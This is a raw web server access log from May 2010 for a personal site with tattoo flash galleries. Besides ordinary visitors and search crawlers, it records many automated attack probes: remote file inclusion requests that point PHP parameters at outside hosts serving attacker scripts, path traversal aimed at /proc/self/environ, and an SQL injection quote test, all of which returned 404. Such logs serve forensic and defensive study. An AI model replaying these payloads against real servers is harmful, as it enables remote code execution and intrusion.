66.235.124.132 - - [10/May/2010:19:00:15 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""-"
66.235.124.132 - - [10/May/2010:19:00:15 -0500] "GET /tattoo/set2.htm HTTP/1.1" 200 1953 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
66.235.124.132 - - [10/May/2010:19:00:15 -0500] "GET /tattoo/tatb1.JPG HTTP/1.1" 200 14848 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
66.235.124.132 - - [10/May/2010:19:00:15 -0500] "GET /tattoo/tatb10.JPG HTTP/1.1" 200 17887 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
66.235.124.132 - - [10/May/2010:19:00:15 -0500] "GET /tattoo/tatb4.JPG HTTP/1.1" 200 15705 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
66.235.124.132 - - [10/May/2010:19:00:15 -0500] "GET /tattoo/tatb2.JPG HTTP/1.1" 200 16592 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
66.235.124.132 - - [10/May/2010:19:00:15 -0500] "GET /tattoo/tatb3.JPG HTTP/1.1" 200 16163 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
66.235.124.132 - - [10/May/2010:19:00:15 -0500] "GET /tattoo/tatb5.JPG HTTP/1.1" 200 20135 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
66.235.124.132 - - [10/May/2010:19:00:15 -0500] "GET /tattoo/tatb6.JPG HTTP/1.1" 200 21190 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
66.235.124.132 - - [10/May/2010:19:00:15 -0500] "GET /tattoo/tatb7.JPG HTTP/1.1" 200 16193 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
66.235.124.132 - - [10/May/2010:19:00:15 -0500] "GET /tattoo/tatb9.JPG HTTP/1.1" 200 21598 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
66.235.124.132 - - [10/May/2010:19:00:15 -0500] "GET /tattoo/tatb8.JPG HTTP/1.1" 200 18467 "http://tomdolan.pconline.com/tattoo/set2.htm""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.11) Gecko GranParadiso/3.0.11"
216.127.70.140 - - [10/May/2010:19:01:09 -0500] "GET /logs/access_log.1268956800//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.motovek.ru/media/errors.txt?? HTTP/1.1" 404 371 "-""libwww-perl/5.65"
216.127.70.140 - - [10/May/2010:19:01:09 -0500] "GET //administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.motovek.ru/media/errors.txt?? HTTP/1.1" 404 344 "-""libwww-perl/5.65"
216.127.70.140 - - [10/May/2010:19:01:09 -0500] "GET /logs//administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=http://www.motovek.ru/media/errors.txt?? HTTP/1.1" 404 349 "-""libwww-perl/5.65"
67.195.112.180 - - [10/May/2010:19:01:42 -0500] "GET /logs/access_log.1233100800 HTTP/1.0" 404 298 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.112.180 - - [10/May/2010:19:01:47 -0500] "GET / HTTP/1.0" 200 991 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
87.250.255.243 - - [10/May/2010:19:03:24 -0500] "GET /tattoo/tattoo-order.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
123.30.181.5 - - [10/May/2010:19:07:49 -0500] "GET /logs////update/update2.php?lang=http://www.totsmartcall.com/1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
123.30.181.5 - - [10/May/2010:19:07:49 -0500] "GET ////update/update2.php?lang=http://www.totsmartcall.com/1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
123.30.181.5 - - [10/May/2010:19:07:49 -0500] "GET /logs/access_log.1270857600%20%20////update/update2.php?lang=http://www.totsmartcall.com/1.txt? HTTP/1.1" 404 334 "-""Mozilla/5.0"
74.52.35.234 - - [10/May/2010:19:10:25 -0500] "GET /news.php?action=http://dozo.rgr.jp/ping/.../com_sef/1.txt?? HTTP/1.1" 404 292 "-""Mozilla/5.0"
74.52.35.234 - - [10/May/2010:19:10:25 -0500] "GET /logs/news.php?action=http://dozo.rgr.jp/ping/.../com_sef/1.txt?? HTTP/1.1" 404 297 "-""Mozilla/5.0"
74.52.35.234 - - [10/May/2010:19:10:26 -0500] "GET /logs/access_log.1272067200/news.php?action=http://dozo.rgr.jp/ping/.../com_sef/1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
87.250.255.243 - - [10/May/2010:19:12:11 -0500] "GET /logs/access_log.1266624000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
74.88.5.87 - - [10/May/2010:19:15:52 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 4192 "http://www.google.com/search?um=1&hl=en&client=firefox-a&rls=org.mozilla:en-US:official&channel=s&q=vintage%20tattoo%20flash&ie=UTF-8&sa=N&tab=iw""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 GTB7.0 ( .NET CLR 3.5.30729)"
74.88.5.87 - - [10/May/2010:19:15:52 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 GTB7.0 ( .NET CLR 3.5.30729)"
74.88.5.87 - - [10/May/2010:19:15:53 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 GTB7.0 ( .NET CLR 3.5.30729)"
74.88.5.87 - - [10/May/2010:19:15:56 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 GTB7.0 ( .NET CLR 3.5.30729)"
87.250.255.243 - - [10/May/2010:19:19:31 -0500] "GET /logs/access_log.1251504000 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.204.237 - - [10/May/2010:19:21:06 -0500] "GET /logs/access_log.1259193600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.46.199.177 - - [10/May/2010:19:23:10 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
74.88.5.87 - - [10/May/2010:19:27:24 -0500] "GET /tattoo/bonus.htm HTTP/1.1" 200 808 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 GTB7.0 ( .NET CLR 3.5.30729)"
74.88.5.87 - - [10/May/2010:19:27:24 -0500] "GET /tattoo/tate4.JPG HTTP/1.1" 200 18555 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 GTB7.0 ( .NET CLR 3.5.30729)"
74.88.5.87 - - [10/May/2010:19:27:24 -0500] "GET /tattoo/tate3.JPG HTTP/1.1" 200 16409 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 GTB7.0 ( .NET CLR 3.5.30729)"
74.88.5.87 - - [10/May/2010:19:27:24 -0500] "GET /tattoo/tate2.JPG HTTP/1.1" 200 13891 "http://tomdolan.pconline.com/tattoo/bonus.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 GTB7.0 ( .NET CLR 3.5.30729)"
74.88.5.87 - - [10/May/2010:19:27:31 -0500] "GET /tattoo/set4.htm HTTP/1.1" 200 1600 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 GTB7.0 ( .NET CLR 3.5.30729)"
74.88.5.87 - - [10/May/2010:19:27:31 -0500] "GET /tattoo/tatd1.JPG HTTP/1.1" 200 14507 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 GTB7.0 ( .NET CLR 3.5.30729)"
74.88.5.87 - - [10/May/2010:19:27:31 -0500] "GET /tattoo/tatd3.JPG HTTP/1.1" 200 12386 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 GTB7.0 ( .NET CLR 3.5.30729)"
74.88.5.87 - - [10/May/2010:19:27:31 -0500] "GET /tattoo/tatd2.JPG HTTP/1.1" 200 14891 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 GTB7.0 ( .NET CLR 3.5.30729)"
74.88.5.87 - - [10/May/2010:19:27:31 -0500] "GET /tattoo/tatd4.JPG HTTP/1.1" 200 12068 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 GTB7.0 ( .NET CLR 3.5.30729)"
74.88.5.87 - - [10/May/2010:19:27:31 -0500] "GET /tattoo/tatd10.JPG HTTP/1.1" 200 19089 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 GTB7.0 ( .NET CLR 3.5.30729)"
74.88.5.87 - - [10/May/2010:19:27:31 -0500] "GET /tattoo/tatd7.JPG HTTP/1.1" 200 20479 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 GTB7.0 ( .NET CLR 3.5.30729)"
74.88.5.87 - - [10/May/2010:19:27:31 -0500] "GET /tattoo/tatd6.JPG HTTP/1.1" 200 12059 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 GTB7.0 ( .NET CLR 3.5.30729)"
74.88.5.87 - - [10/May/2010:19:27:31 -0500] "GET /tattoo/msameric.JPG HTTP/1.1" 200 14283 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 GTB7.0 ( .NET CLR 3.5.30729)"
74.88.5.87 - - [10/May/2010:19:27:31 -0500] "GET /tattoo/tatd9.JPG HTTP/1.1" 200 17368 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 GTB7.0 ( .NET CLR 3.5.30729)"
74.88.5.87 - - [10/May/2010:19:27:31 -0500] "GET /tattoo/tatd8.JPG HTTP/1.1" 200 13038 "http://tomdolan.pconline.com/tattoo/set4.htm""Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 GTB7.0 ( .NET CLR 3.5.30729)"
216.129.119.41 - - [10/May/2010:19:27:31 -0500] "GET /logs/access_log.1234137600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
118.129.170.48 - - [10/May/2010:19:28:30 -0500] "GET /!DEX../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 350 "-""libwww-perl/5.805"
87.250.255.243 - - [10/May/2010:19:30:42 -0500] "GET /logs/access_log.1222646400 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
118.129.170.48 - - [10/May/2010:19:33:00 -0500] "GET /logs/access_log.1272067200/!DEX../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 377 "-""libwww-perl/5.805"
118.129.170.48 - - [10/May/2010:19:33:01 -0500] "GET /!DEX../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 350 "-""libwww-perl/5.805"
118.129.170.48 - - [10/May/2010:19:33:01 -0500] "GET /logs/!DEX../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 355 "-""libwww-perl/5.805"
207.46.13.87 - - [10/May/2010:19:33:05 -0500] "GET /logs/access_log.1199059200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
216.127.70.140 - - [10/May/2010:19:36:42 -0500] "GET //index1.php?choix=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.65"
216.127.70.140 - - [10/May/2010:19:36:54 -0500] "GET /logs/access_log.1272067200//index1.php?choix=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 322 "-""libwww-perl/5.65"
216.127.70.140 - - [10/May/2010:19:36:54 -0500] "GET //index1.php?choix=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.65"
216.127.70.140 - - [10/May/2010:19:36:54 -0500] "GET /logs//index1.php?choix=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.65"
216.129.119.43 - - [10/May/2010:19:37:12 -0500] "GET /logs/access_log.1272585600 HTTP/1.1" 200 433875 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
216.127.70.140 - - [10/May/2010:19:37:12 -0500] "GET /logs//index1.php?choix=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 300 "-""libwww-perl/5.65"
216.127.70.140 - - [10/May/2010:19:37:12 -0500] "GET //index1.php?choix=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 295 "-""libwww-perl/5.65"
62.44.82.61 - - [10/May/2010:19:38:40 -0500] "GET //components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.yourforestavenue.com//sc1? HTTP/1.1" 404 328 "-""Mozilla/5.0"
62.44.82.61 - - [10/May/2010:19:38:40 -0500] "GET /logs//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.yourforestavenue.com//sc1? HTTP/1.1" 404 333 "-""Mozilla/5.0"
62.44.82.61 - - [10/May/2010:19:38:40 -0500] "GET /logs/access_log.1273190400%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.yourforestavenue.com//sc1? HTTP/1.1" 404 357 "-""Mozilla/5.0"
62.44.82.61 - - [10/May/2010:19:38:41 -0500] "GET /logs/access_log.1272067200%20%20//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig.absolute.path=http://www.yourforestavenue.com//sc1? HTTP/1.1" 404 357 "-""Mozilla/5.0"
207.46.195.225 - - [10/May/2010:19:41:05 -0500] "GET /logs/access_log.1244505600 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
118.129.170.48 - - [10/May/2010:19:42:07 -0500] "GET /logs/access_log.1273190400/!DEX../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 377 "-""libwww-perl/5.805"
87.250.255.243 - - [10/May/2010:19:43:28 -0500] "GET /tattoo/set2.htm HTTP/1.1" 304 - "-""Yandex/1.01.001 (compatible; Win16; I)"
72.26.122.245 - - [10/May/2010:19:43:42 -0500] "GET /logs/kietu[url_hit]=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 362 "-""Mozilla/5.0"
72.26.122.245 - - [10/May/2010:19:43:42 -0500] "GET /kietu[url_hit]=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
72.26.122.245 - - [10/May/2010:19:43:42 -0500] "GET /logs/access_log.1264982400/kietu[url_hit]=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 384 "-""Mozilla/5.0"
216.129.119.42 - - [10/May/2010:19:43:45 -0500] "GET /logs/access_log.1233705600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
67.218.116.131 - - [10/May/2010:19:44:51 -0500] "GET /logs/access_log.1250380800 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
207.46.204.193 - - [10/May/2010:19:46:35 -0500] "GET /logs/access_log.1203984000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
87.250.255.243 - - [10/May/2010:19:56:14 -0500] "GET /logs/access_log.1269561600 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
216.129.119.12 - - [10/May/2010:19:56:45 -0500] "GET /logs/access_log.1240272000 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
114.108.177.210 - - [10/May/2010:19:58:57 -0500] "GET /index1.php?site=' HTTP/1.1" 404 294 "-""libwww-perl/5.79"
207.46.199.47 - - [10/May/2010:20:03:35 -0500] "GET /logs/access_log.1243728000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
114.108.177.210 - - [10/May/2010:20:07:09 -0500] "GET /logs/access_log.1270857600/index1.php?site=' HTTP/1.1" 404 321 "-""libwww-perl/5.79"
114.108.177.210 - - [10/May/2010:20:07:09 -0500] "GET /index1.php?site=' HTTP/1.1" 404 294 "-""libwww-perl/5.79"
114.108.177.210 - - [10/May/2010:20:07:10 -0500] "GET /logs/index1.php?site=' HTTP/1.1" 404 299 "-""libwww-perl/5.79"
87.250.255.243 - - [10/May/2010:20:08:56 -0500] "GET /logs/access_log.1244419200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
207.46.199.37 - - [10/May/2010:20:15:05 -0500] "GET /logs/access_log.1221696000 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
119.63.193.56 - - [10/May/2010:20:16:09 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Baiduspider+(+http://www.baidu.jp/spider/)"
87.250.255.243 - - [10/May/2010:20:19:44 -0500] "GET /logs/access_log.1269907200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
131.107.151.126 - - [10/May/2010:20:23:44 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""MSRBOT"
131.107.151.126 - - [10/May/2010:20:23:44 -0500] "GET /costume/ HTTP/1.0" 200 640 "-""MSRBOT"
131.107.151.126 - - [10/May/2010:20:23:44 -0500] "GET /CA3CA2F8BFBB7ADD HTTP/1.0" 404 288 "-""MSRBOT"
67.195.112.180 - - [10/May/2010:20:25:04 -0500] "GET /logs/?M=A HTTP/1.0" 200 5111 "-""Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
121.88.4.141 - - [10/May/2010:20:26:31 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.88.4.141 - - [10/May/2010:20:26:31 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
121.88.4.141 - - [10/May/2010:20:26:32 -0500] "GET /logs/access_log.1268956800/modules/Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
121.88.4.141 - - [10/May/2010:20:26:46 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.88.4.141 - - [10/May/2010:20:26:46 -0500] "GET /logs/access_log.1268956800/modules/Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 342 "-""Mozilla/5.0"
121.88.4.141 - - [10/May/2010:20:26:46 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
121.88.4.141 - - [10/May/2010:20:27:29 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
121.88.4.141 - - [10/May/2010:20:27:29 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.88.4.141 - - [10/May/2010:20:27:30 -0500] "GET /logs/access_log.1268956800%20%20/modules/Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
121.88.4.141 - - [10/May/2010:20:27:30 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 315 "-""Mozilla/5.0"
121.88.4.141 - - [10/May/2010:20:27:30 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.88.4.141 - - [10/May/2010:20:27:30 -0500] "GET /logs/access_log.1268956800%20%20/modules/Neos_Chronos/header.php?base_folder=http://www.howtolisten.kr//parti/data/admin/auto1.txt??? HTTP/1.1" 404 344 "-""Mozilla/5.0"
83.69.115.198 - - [10/May/2010:20:28:32 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
83.69.115.198 - - [10/May/2010:20:28:33 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
83.69.115.198 - - [10/May/2010:20:28:34 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
72.26.122.245 - - [10/May/2010:20:28:51 -0500] "GET /logs/access_log.1263340800/sourcedir=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 379 "-""Mozilla/5.0"
72.26.122.245 - - [10/May/2010:20:28:51 -0500] "GET /sourcedir=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 352 "-""Mozilla/5.0"
72.26.122.245 - - [10/May/2010:20:28:51 -0500] "GET /logs/sourcedir=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
217.173.194.130 - - [10/May/2010:20:29:19 -0500] "GET //%20%20/index.php?sourcedir=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
217.173.194.130 - - [10/May/2010:20:29:19 -0500] "GET /logs//%20%20/index.php?sourcedir=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
217.173.194.130 - - [10/May/2010:20:29:19 -0500] "GET /logs/access_log.1262476800//%20%20/index.php?sourcedir=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
72.26.122.245 - - [10/May/2010:20:29:29 -0500] "GET /logs/access_log.1262476800/sourcedir=http://www.miranda.gov.ve/desamiranda/libraries/export/cgi??? HTTP/1.1" 404 379 "-""Mozilla/5.0"
217.173.194.130 - - [10/May/2010:20:29:34 -0500] "GET /logs//%20%20/index.php?sourcedir=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
87.250.255.243 - - [10/May/2010:20:29:40 -0500] "GET /logs/access_log.1228867200 HTTP/1.1" 404 310 "-""Yandex/1.01.001 (compatible; Win16; I)"
217.173.194.130 - - [10/May/2010:20:29:45 -0500] "GET //%20%20/index.php?sourcedir=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
217.173.194.130 - - [10/May/2010:20:29:47 -0500] "GET /logs/access_log.1262476800//%20%20/index.php?sourcedir=http://nic.bupt.edu.cn/media/j1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
216.129.119.41 - - [10/May/2010:20:30:34 -0500] "GET /logs/access_log.1236297600 HTTP/1.1" 404 310 "-""Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
83.69.115.198 - - [10/May/2010:20:33:37 -0500] "GET /logs/access_log.1273190400//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
83.69.115.198 - - [10/May/2010:20:33:38 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
83.69.115.198 - - [10/May/2010:20:33:38 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
83.69.115.198 - - [10/May/2010:20:33:38 -0500] "GET /logs/access_log.1273190400//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
83.69.115.198 - - [10/May/2010:20:33:38 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
83.69.115.198 - - [10/May/2010:20:33:39 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
83.69.115.198 - - [10/May/2010:20:33:45 -0500] "GET /logs/access_log.1273190400//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.79"
83.69.115.198 - - [10/May/2010:20:33:45 -0500] "GET //index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.79"
83.69.115.198 - - [10/May/2010:20:33:46 -0500] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.79"
121.190.102.21 - - [10/May/2010:20:34:33 -0500] "GET /index.php?option=com_facileforms//show_image_in_imgtag.php?mosConfig.absolute.path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
121.190.102.21 - - [10/May/2010:20:34:33 -0500] "GET /logs/index.php?option=com_facileforms//show_image_in_imgtag.php?mosConfig.absolute.path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
121.190.102.21 - - [10/May/2010:20:34:33 -0500] "GET /logs/access_log.1262476800/index.php?option=com_facileforms//show_image_in_imgtag.php?mosConfig.absolute.path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
121.190.102.21 - - [10/May/2010:20:35:48 -0500] "GET /logs/access_log.1268956800%20%20//component/option,com_facileforms///components/com_facileforms//show_image_in_imgtag.php?mosConfig.absolute.path=http://mpress.com.ua///templates/zfxid1.txt??? HTTP/1.1" 404 401 "-""Mozilla/5.0"
